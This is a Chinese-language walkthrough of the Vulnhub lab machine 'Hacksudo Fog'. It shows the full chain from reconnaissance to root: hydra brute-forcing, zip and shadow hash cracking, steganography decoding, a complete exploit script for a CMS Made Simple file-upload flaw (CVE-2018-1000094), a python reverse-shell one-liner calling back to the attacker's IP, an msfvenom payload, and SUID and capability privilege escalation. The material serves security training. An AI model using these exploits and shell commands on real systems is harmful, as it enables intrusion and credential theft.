Hacksudo Fog识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                                                                                                                     3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             _____________________________________________________________________________   IP            At MAC Address     Count     Len  MAC Vendor / Hostname       ----------------------------------------------------------------------------- 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            192.168.56.100  08:00:27:c9:cb:54      1      60  PCS Systemtechnik GmbH                                                    192.168.56.254  08:00:27:6f:3c:95      1      60  PCS Systemtechnik GmbH       

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scanStarting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 06:34 EDTNmap scan report for inplainsight (192.168.56.254)Host is up (0.00017s latency).Not shown: 65524 closed tcp ports (reset)PORT      STATE SERVICE  VERSION21/tcp    open  ftp      Pure-FTPd22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: |   2048 62ce1b7d4e240f8ac1c9eac41e21a7f3 (RSA)|   256 92045a0a8662b3ba00f3826ac98dae6d (ECDSA)|_  256 74c57c9f8d06ee0c545e65b230429849 (ED25519)80/tcp    open  http     Apache httpd 2.4.38 ((Debian))|_http-title: Hacksudo FOG|_http-server-header: Apache/2.4.38 (Debian)111/tcp   open  rpcbind  2-4 (RPC #100000)| rpcinfo: |   program version    port/proto  service|   100000  2,3,4        111/tcp   rpcbind|   100000  2,3,4        111/udp   rpcbind|   100000  3,4          111/tcp6  rpcbind|   100000  3,4          111/udp6  rpcbind|   100003  3           2049/udp   nfs|   100003  3           2049/udp6  nfs|   100003  3,4         2049/tcp   nfs|   100003  3,4         2049/tcp6  nfs|   100005  1,2,3      34008/udp6  mountd|   100005  1,2,3      42789/tcp6  mountd|   100005  1,2,3      44689/tcp   mountd|   100005  1,2,3      54872/udp   mountd|   100021  1,3,4      35042/udp6  nlockmgr|   100021  1,3,4      36081/tcp6  nlockmgr|   100021  1,3,4      39467/tcp   nlockmgr|   100021  1,3,4      57221/udp   nlockmgr|   100227  3           2049/tcp   nfs_acl|   100227  3           2049/tcp6  nfs_acl|   100227  3           2049/udp   nfs_acl|_  100227  3           2049/udp6  nfs_acl443/tcp   open  http     Apache httpd 2.4.38|_http-server-header: Apache/2.4.38 (Debian)|_http-title: Hacksudo FOG2049/tcp  open  nfs_acl  3 (RPC #100227)3306/tcp  open  mysql    MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1| mysql-info: |   Protocol: 10|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1|   Thread ID: 90|   Capabilities flags: 63486|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSigpipes, FoundRows, InteractiveClient, ODBCClient, ConnectWithDatabase, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins|   Status: Autocommit|   Salt: N+*0T4IO5V4>zm7dvD0`|_  Auth Plugin Name: mysql_native_password37535/tcp open  mountd   1-3 (RPC #100005)39467/tcp open  nlockmgr 1-4 (RPC #100021)44689/tcp open  mountd   1-3 (RPC #100005)53383/tcp open  mountd   1-3 (RPC #100005)MAC Address: 08:00:27:6F:3C:95 (Oracle VirtualBox virtual NIC)Service Info: Host: hacksudo.hacksudo; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ ftp 192.168.56.254Connected to 192.168.56.254.220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 06:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.Name (192.168.56.254:kali): anonymous331 User anonymous OK. Password requiredPassword: 530 Login authentication failedftp: Login failedftp> quit221-Goodbye. You uploaded 0 and downloaded 0 kbytes.221 Logout.                                                                                                                             ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ searchsploit Pure-FTPd                                     ------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                             |  Path------------------------------------------------------------------------------------------- ---------------------------------Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)  | linux/remote/34862.rbPure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)         | linux/dos/20479.plPure-FTPd 1.0.48 - Remote Denial of Service                                                | multiple/dos/49105.py------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
  1. FTP服务为Pure-FTPd, 版本未知

  2. 不允许匿名访问

  3. 可能存在可以利用的漏洞

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ mysql -uroot -p -h 192.168.56.254     Enter password: ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)

经简单尝试,mysql不存在弱口令漏洞。

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ showmount -e 192.168.56.254Export list for 192.168.56.254:

虽然目标主机配置了NFS共享,但是没有得到共享目录名称。

访问80端口,页面中有链接index1.html

──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ curl http://192.168.56.254/index1.html                             hacksudo-fogTEAM

Hacksudo:FOG-TEAM

Fog Project /fog/index.php]/.html (Status: 403) [Size: 279]/index.html (Status: 200) [Size: 853]/index1.html (Status: 200) [Size: 329]/cms (Status: 301) [Size: 314] [--> http://192.168.56.254/cms/]/dict.txt (Status: 200) [Size: 1798]/fog (Status: 301) [Size: 314] [--> http://192.168.56.254/fog/]/.html (Status: 403) [Size: 279]/.php (Status: 403) [Size: 279]

gobuster工具扫描出文件dict.txt,以及目录/fog,但/fog没啥用。

──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ wget http://192.168.56.254/dict.txt--2023-04-25 06:55:23--  http://192.168.56.254/dict.txtConnecting to 192.168.56.254:80... connected.HTTP request sent, awaiting response... 200 OKLength: 1798 (1.8K) [text/plain]Saving to: ‘dict.txt’dict.txt                        100%[=====================================================>]   1.76K  --.-KB/s    in 0s      2023-04-25 06:55:23 (89.6 MB/s) - ‘dict.txt’ saved [1798/1798]

很明显dict.txt是字典文件。

先看下这个字典文件是否可以用来破解ssh,用户名为hacksudo(从页面代码的注释知:作者名为hacksudo)

─(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ hydra -l hacksudo -P dict.txt ssh://192.168.56.254       

但是破解没有成功。

目录扫描/cms的下级目录,可知存在/admin,为用户登录页面,接下里用Hydra破解一下用户登录

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ hydra -l hacksudo -P dict.txt -f 192.168.56.254 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-25 07:14:40[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task[DATA] attacking http-post-form://192.168.56.254:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect1 of 1 target completed, 0 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-25 07:14:44                                                                                                                              ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ hydra -l admin -P dict.txt -f 192.168.56.254 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"

但是都没有破解出来。

怎么把ftp服务忘了,试一下:

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ hydra -l hacksudo -P dict.txt ftp://192.168.56.254Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-25 07:17:07[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task[DATA] attacking ftp://192.168.56.254:21/[21][ftp] host: 192.168.56.254   login: hacksudo   password: hackme

成功得到ftp的用户名和密码。

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ ftp 192.168.56.254Connected to 192.168.56.254.220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:17. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.Name (192.168.56.254:kali): hacksudo331 User hacksudo OK. Password requiredPassword: 230 OK. Current directory is /Remote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh229 Extended Passive mode OK (|||62242|)150 Accepted data connectiondrwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 .drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 ..-rw-r--r--    1 33         33                389 May  7  2021 flag1.txtdrwxr-xr-x    2 0          0                4096 May  6  2021 hacksudo_ISRO_bak226-Options: -a -l 226 4 matches totalftp> get flag1.txtlocal: flag1.txt remote: flag1.txt229 Extended Passive mode OK (|||25989|)150 Accepted data connection100% |*********************************************************************************|   389      734.78 KiB/s    00:00 ETA226-File successfully transferred226 0.001 seconds (measured here), 0.66 Mbytes per second389 bytes received in 00:00 (317.62 KiB/s)ftp> cd hacksudo_ISRO_bak250 OK. Current directory is /hacksudo_ISRO_bakftp> ls -alh229 Extended Passive mode OK (|||51758|)150 Accepted data connectiondrwxr-xr-x    2 0          0                4096 May  6  2021 .drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 ..-rw-r--r--    1 0          0                  63 May  5  2021 authors.txt-rw-r--r--    1 0          0                   0 May  6  2021 installfog-rw-r--r--    1 0          0             1573833 May  6  2021 secr3tSteg.zip226-Options: -a -l 226 5 matches totalftp> get authors.txtlocal: authors.txt remote: authors.txt229 Extended Passive mode OK (|||6620|)150 Accepted data connection100% |*********************************************************************************|    63       90.74 KiB/s    00:00 ETA226-File successfully transferred226 0.001 seconds (measured here), 86.65 Kbytes per second63 bytes received in 00:00 (78.77 KiB/s)ftp> get installfoglocal: installfog remote: installfog229 Extended Passive mode OK (|||38715|)150 Accepted data connection     0        0.00 KiB/s 226 File successfully transferredftp> get secr3tSteg.ziplocal: secr3tSteg.zip remote: secr3tSteg.zip229 Extended Passive mode OK (|||61257|)150-Accepted data connection150-The computer is your friend. Trust the computer150 1536.9 kbytes to download100% |*********************************************************************************|  1536 KiB  136.22 MiB/s    00:00 ETA226-File successfully transferred226 0.010 seconds (measured here), 150.32 Mbytes per second1573833 bytes received in 00:00 (132.86 MiB/s)
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ cat flag1.txt great you done step 1 ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __   / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \ | (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | | \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|                 |___/                                               www.hacksudo.com

得到了第1个flag

──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ zip2john secr3tSteg.zip > hashver 2.0 efh 5455 efh 7875 secr3tSteg.zip/hacksudoSTEGNO.wav PKZIP Encr: TS_chk, cmplen=1573432, decmplen=1965596, crc=8B4A9445 ts=9A86 cs=9a86 type=8ver 1.0 efh 5455 efh 7875 ** 2b ** secr3tSteg.zip/secr3t.txt PKZIP Encr: TS_chk, cmplen=35, decmplen=23, crc=DD73D9B0 ts=9AB0 cs=9ab0 type=0NOTE: It is assumed that all files in each archive have the same password.If that is not the case, the hash may be uncrackable. To avoid this, useoption -o to pick a file at a time.                                                                                                                              ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ ls -alhtotal 2.6Mdrwxr-xr-x   3 kali kali 4.0K Apr 25 07:19 .drwxr-xr-x 116 kali kali 4.0K Apr 25 06:33 ..-rw-r--r--   1 kali kali   63 May  5  2021 authors.txt-rw-r--r--   1 kali kali 1.8K May  8  2021 dict.txt-rw-r--r--   1 kali kali  389 May  7  2021 flag1.txt-rw-r--r--   1 kali kali  20K Nov 27  2020 https://www.cnblogs.com/jason-huawen/archive/2023/04/25/fog.jpg-rw-r--r--   1 kali kali  294 Apr 25 07:19 hash-rw-r--r--   1 kali kali    0 May  6  2021 installfog-rw-r--r--   1 root root 2.9K Apr 25 06:34 nmap_full_scan-rw-r--r--   1 kali kali 1.6M May  6  2021 secr3tSteg.zip-rw-r--r--   1 kali kali 990K May 11  2021 smoke.mp4drwxr-xr-x   3 kali kali 4.0K Apr 25 06:46 SoundStegno                                                                                                                              ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash        Using default input encoding: UTF-8Loaded 1 password hash (PKZIP [32/64])No password hashes left to crack (see FAQ)                                                                                                                              ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ john --show hash                                     secr3tSteg.zip:fooled::secr3tSteg.zip:secr3t.txt, hacksudoSTEGNO.wav:secr3tSteg.zip1 password hash cracked, 0 left

利用john工具破解得到了压缩文档的加密密码

解压缩得到了音频文件hacksudoSTEGNO.wav,此时就可以用到作者最开始所给出的提示

──(kali㉿kali)-[~/Vulnhub/HacksudoFog/SoundStegno]└─$ python ExWave.py -f ../hacksudoSTEGNO.wavYour Secret Message is: Shift by 3ABCDEFGHIJKLMNOPQRSTUVWXYZDEFGHIJKLMNOPQRSTUVWXYZABCzzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR

用网站解密:

https://www.dcode.fr/shift-cipher
wwww.localhost/fog Username=fog:password=hacksudoISRO

成功登录/cms/admin

──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ searchsploit -m php/webapps/44976.py  Exploit: CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution      URL: https://www.exploit-db.com/exploits/44976     Path: /usr/share/exploitdb/exploits/php/webapps/44976.py    Codes: CVE-2018-1000094 Verified: TrueFile Type: Python script, ASCII text executableCopied to: /home/kali/Vulnhub/HacksudoFog/44976.py

需要根据靶机情况修改上述代码,包括base_url, username, password, csrf_param等

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ cat 44976.py                                                       # Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution# Date: 3rd of July, 2018# Exploit Author: Mustafa Hasan (@strukt93)# Vendor Homepage: http://www.cmsmadesimple.org/# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/# Version: 2.2.5# CVE: CVE-2018-1000094import requestsimport base64base_url = "http://192.168.56.254/cms/admin"upload_dir = "/uploads"upload_url = base_url.split('/admin')[0] + upload_dirusername = "fog"password = "hacksudoISRO"csrf_param = "_sk_"txt_filename = 'cmsmsrce.txt'php_filename = 'shell.php'payload = ""def parse_csrf_token(location):    return location.split(csrf_param + "=")[1]def authenticate():    page = "/login.php"    url = base_url + page    data = {        "username": username,        "password": password,        "loginsubmit": "Submit"    }    response  = requests.post(url, data=data, allow_redirects=False)    status_code = response.status_code    if status_code == 302:        print "[+] Authenticated successfully with the supplied credentials"        return response.cookies, parse_csrf_token(response.headers['Location'])    print "[-] Authentication failed"    return None, Nonedef upload_txt(cookies, csrf_token):    mact = "FileManager,m1_,upload,0"    page = "/moduleinterface.php"    url = base_url + page    data = {        "mact": mact,        csrf_param: csrf_token,        "disable_buffer": 1    }    txt = {        'm1_files[]': (txt_filename, payload)    }    print "[*] Attempting to upload {}...".format(txt_filename)    response = requests.post(url, data=data, files=txt, cookies=cookies)    status_code = response.status_code    if status_code == 200:        print "[+] Successfully uploaded {}".format(txt_filename)        return True    print "[-] An error occurred while uploading {}".format(txt_filename)    return Nonedef copy_to_php(cookies, csrf_token):    mact = "FileManager,m1_,fileaction,0"    page = "/moduleinterface.php"    url = base_url + page    b64 = base64.b64encode(txt_filename)    serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)    data = {        "mact": mact,        csrf_param: csrf_token,        "m1_fileactioncopy": "",        "m1_path": upload_dir,        "m1_selall": serialized,        "m1_destdir": "/",        "m1_destname": php_filename,        "m1_submit": "Copy"    }    print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)    response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)    status_code = response.status_code    if status_code == 302:        if response.headers['Location'].endswith('copysuccess'):            print "[+] File copied successfully"            return True    print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)    return Nonedef quit():    print "[-] Exploit failed"    exit()def run():    cookies,csrf_token = authenticate()    if not cookies:        quit()    if not upload_txt(cookies, csrf_token):        quit()    if not copy_to_php(cookies, csrf_token):        quit()    print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)run()
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ python2 44976.py[+] Authenticated successfully with the supplied credentials[*] Attempting to upload cmsmsrce.txt...[+] Successfully uploaded cmsmsrce.txt[*] Attempting to copy cmsmsrce.txt to shell.php...[+] File copied successfully[+] Exploit succeeded, shell can be found at: http://192.168.56.254/cms/uploads/shell.php

成功执行

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ curl http://192.168.56.254/cms/uploads/shell.php?cmd=iduid=33(www-data) gid=33(www-data) groups=33(www-data)

下一步是要得到shell

http://192.168.56.254/cms/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

在Kali Linux上成功得到了目标主机反弹回来的shell

──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ sudo nc -nlvp 5555                                         [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 44348/bin/sh: 0: can't access tty; job control turned off$ python -c 'import pty;pty.spawn("/bin/bash")'www-data@hacksudo:~/html/cms/uploads$ cd /homecd /homewww-data@hacksudo:/home$ ls -alhls -alhtotal 24Kdrwxr-xr-x  6 root root 4.0K May  8  2021 .drwxr-xr-x 20 root root 4.0K May  9  2021 ..drwxr-xr-x  3 root root 4.0K May  7  2021 backupsdrwxr-xr-x  2 root root 4.0K May  8  2021 fogDBbackupsdrwxr-x---  4 1001 1001 4.0K May  6  2021 fogprojectdrwxr-x---  5 isro isro 4.0K May 13  2021 isro
www-data@hacksudo:~$  cat flag2.txt cat flag2.txtyou successfully crack web and got shell access!!!                                _         _       _   _               ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __   / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \ | (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | | \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|step 2 done.     _               ____   ___| |_ ___ _ __   |___ \ / __| __/ _ \ '_ \    __) |\__ \ ||  __/ |_) |  / __/ |___/\__\___| .__/  |_____|            |_|            

得到了第2个flag.

www-data@hacksudo:~/html/cms$ cat config.phpcat config.php<?php# CMS Made Simple Configuration File# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference#$config['dbms'] = 'mysqli';$config['db_hostname'] = 'localhost';$config['db_username'] = 'cmsms';$config['db_password'] = 'password';$config['db_name'] = 'cmsms_db';$config['db_prefix'] = 'cms_';$config['timezone'] = 'Asia/Kolkata';

得到了数据库连接的用户名和密码,连接到数据库:

>www-data@hacksudo:~/html/cms$ mysql -ucmsms -pmysql -ucmsms -pEnter password: passwordWelcome to the MariaDB monitor.  Commands end with ; or \g.Your MariaDB connection id is 949Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MariaDB [(none)]> show databases;show databases;+--------------------+| Database           |+--------------------+| cmsms_db           || information_schema |+--------------------+
MariaDB [cmsms_db]> select * from cms_users;select * from cms_users;+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+| user_id | username | password                         | admin_access | first_name | last_name | email               | active | create_date         | modified_date       |+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+|       1 | hacksudo | cd658361db0ee541e7fc728aba5570d3 |            1 |            |           | info@hacksudo.com   |      1 | 2021-05-10 05:01:14 | 2021-05-11 23:49:00 ||       2 | fog      | cd658361db0ee541e7fc728aba5570d3 |            1 | sudo       |           | vishal@hacksudo.com |      1 | 2021-05-11 23:48:24 | 2021-05-11 23:48:24 |+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+
www-data@hacksudo:/home$ find / -perm -4000 -type f 2>/dev/nullfind / -perm -4000 -type f 2>/dev/null/usr/lib/openssh/ssh-keysign/usr/lib/eject/dmcrypt-get-device/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/sbin/mount.nfs/usr/bin/gpasswd/usr/bin/umount/usr/bin/sudo/usr/bin/chfn/usr/bin/look/usr/bin/mount/usr/bin/chsh/usr/bin/newgrp/usr/bin/su/usr/bin/passwd

可以利用look的SUID位提权

www-data@hacksudo:/home$ LFILE=/etc/shadowLFILE=/etc/shadowwww-data@hacksudo:/home$ /usr/bin/look '' "$LFILE"isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::

利用john破解isro的密码

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ cat isro_hash           isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ john --wordlist=/usr/share/wordlists/rockyou.txt isro_hash                     Using default input encoding: UTF-8Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])Cost 1 (iteration count) is 5000 for all loaded hashesWill run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusqwerty           (isro)     1g 0:00:00:00 DONE (2023-04-25 08:08) 9.090g/s 2327p/s 2327c/s 2327C/s 123456..freedomUse the "--show" option to display all of the cracked passwords reliablySession completed. 

破解得到了isro的密码。

──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ ssh isro@192.168.56.254                                        The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.ED25519 key fingerprint is SHA256:FfPfu4QjjjHuWE3UZ3+9fKmCs9MSH7JibTk2QXKelwc.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.isro@192.168.56.254's password: Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Thu May 13 07:25:51 2021 from 192.168.43.217isro@hacksudo:~$ iduid=1003(isro) gid=1003(isro) groups=1003(isro)isro@hacksudo:~$ sudo -l[sudo] password for isro: Matching Defaults entries for isro on hacksudo:    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser isro may run the following commands on hacksudo:    (root) /usr/bin/ls /home/isro/*isro@hacksudo:~$ ls -alhtotal 32Kdrwxr-x--- 5 isro isro 4.0K May 13  2021 .drwxr-xr-x 6 root root 4.0K May  8  2021 ..-rw-r--r-- 1 isro isro    0 May  5  2021 .bash_logout-rw-r--r-- 1 isro isro 4.6K May 13  2021 .bashrcdrwxr-xr-x 2 isro isro 4.0K May 13  2021 fogdrwx------ 3 isro isro 4.0K May  5  2021 .gnupgdrwxr-xr-x 3 isro isro 4.0K May  5  2021 .local-rw-r--r-- 1 isro isro    0 May  5  2021 .profile-r-------- 1 isro isro   33 May  6  2021 user.txtisro@hacksudo:~$ cat user.txt8b64d2451b7a8f3fd17390f88ea35917isro@hacksudo:~$ 

提权

接下来看能否升级shell到meterpreter会话

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload[-] No arch selected, selecting arch: x86 from the payloadNo encoder specified, outputting raw payloadPayload size: 123 bytesFinal size of elf file: 207 bytesSaved as: escalate.elf

将escalate.elf上传至目标主机/tmp目录

但是suggester没有找到可以提权成功的模块。

将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行,发现fog有setuid位

Files with capabilities (limited to 50):/home/isro/fog/fog = cap_setuid+ep

执行/home/isro/fog/fog,发现其实就是Python,因此可以轻松提权

isro@hacksudo:~/fog$ ./fogPython 2.7.16 (default, Oct 10 2019, 22:02:15) [GCC 8.3.0] on linux2Type "help", "copyright", "credits" or "license" for more information.>>> import os>>> import pty>>> pty.spawn("/bin/bash")┌──(root?hacksudo)-[~/fog]└─# id                                                                                                                        uid=0(root) gid=1003(isro) groups=1003(isro)┌──(root?hacksudo)-[~/fog]└─# cd /root                                                                                                                  ┌──(root?hacksudo)-[/root]└─# ls -alh                                                                                                                   total 44Kdrwx------  5 root root 4.0K May 10  2021 .drwxr-xr-x 20 root root 4.0K May  9  2021 ..-rw-------  1 root root  638 May 13  2021 .bash_history-rw-r--r--  1 root root  598 May  6  2021 .bashrcdrwxr-xr-x 10 root root 4.0K May  8  2021 fogproject-1.5.9drwx------  3 root root 4.0K May  6  2021 .gnupgdrwxr-xr-x  3 root root 4.0K May  4  2021 .local-rw-------  1 root root  738 May 10  2021 .mysql_history-rw-r--r--  1 root root  178 May  4  2021 .profile-r--------  1 root 1000 1.5K May  6  2021 root.txt-rw-r--r--  1 root root  249 May 10  2021 .wget-hsts┌──(root?hacksudo)-[/root]└─# cat root.txt                                                                                                                       .                                                      .        .n                   .                 .                  n.  .   .dP                  dP                   9b                 9b.    . 4    qXb         .       dX                     Xb       .        dXp     tdX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'    `9XXXXXXXXXXXP' `9XX'   DIE    `98v8P'  HUMAN   `XXP' `9XXXXXXXXXXXP'        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~                        )b.  .dbo.dP'`v'`9b.odb.  .dX(                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP                     `'      9XXXXXX(   )XXXXXXP      `'                              XXXX X.`v'.X XXXX                              XP^X'`b   d'`X^XX                              X. 9  `   '  P )X                              `b  `       '  d'                               `             'great you rooted hacksudo Fog Box !!!flag {4356a779ce18252fa1dd2d2b6ab56b19}submit this flag at hacksudo discord https://discord.gg/vK4NRYt3

STRIVE FOR PROGRESS,NOT FOR PERFECTION